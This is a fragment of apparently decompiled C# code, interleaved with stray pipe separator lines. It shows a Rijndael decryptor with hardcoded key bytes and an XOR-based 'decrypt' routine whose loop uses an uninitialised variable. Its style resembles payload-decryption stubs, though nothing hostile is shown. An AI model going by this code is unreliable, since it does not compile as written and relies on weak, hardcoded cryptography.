(byte) 1,
|
|||
|
(byte) 9,
|
|||
|
(byte) 8,
|
|||
|
(byte) 7,
|
|||
|
(byte) 6,
|
|||
|
(byte) 5,
|
|||
|
(byte) 4,
|
|||
|
(byte) 3,
|
|||
|
(byte) 2,
|
|||
|
(byte) 1
|
|||
|
};
|
|||
|
return rijndaelManaged.CreateDecryptor().TransformFinalBlock(data, 0, data.Length);
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
public static byte[] decrypt(byte[] message, string password)
|
|||
|
{
|
|||
|
byte[] bytes = Encoding.Default.GetBytes(password);
|
|||
|
int num1 = (int) message[checked (message.Length - 1)] ^ 112;
|
|||
|
byte[] arySrc = new byte[checked (message.Length + 1)];
|
|||
|
int num2 = checked (message.Length - 1);
|
|||
|
int index1 = 0;
|
|||
|
while (index1 <= num2)
|
|||
|
{
|
|||
|
int index2;
|
|||
|
arySrc[index1] = checked ((byte) ((int) message[index1] ^ num1 ^ (int) bytes[index2]));
|
|||
|
if (index2 == checked (password.Length - 1))
|
|||
|
index2 = 0;
|
|||
|
else
|
|||
|
checked { ++index2; }
|
|||
|
checked { ++index1; }
|
|||
|
}
|
|||
|
return (byte[]) Microsoft.VisualBasic.CompilerServices.Utils.CopyArray((Array) arySrc, (Array) new byte[checked (message.Length - 2 + 1)]);
|
|||
|
}
|
|||
|
}
|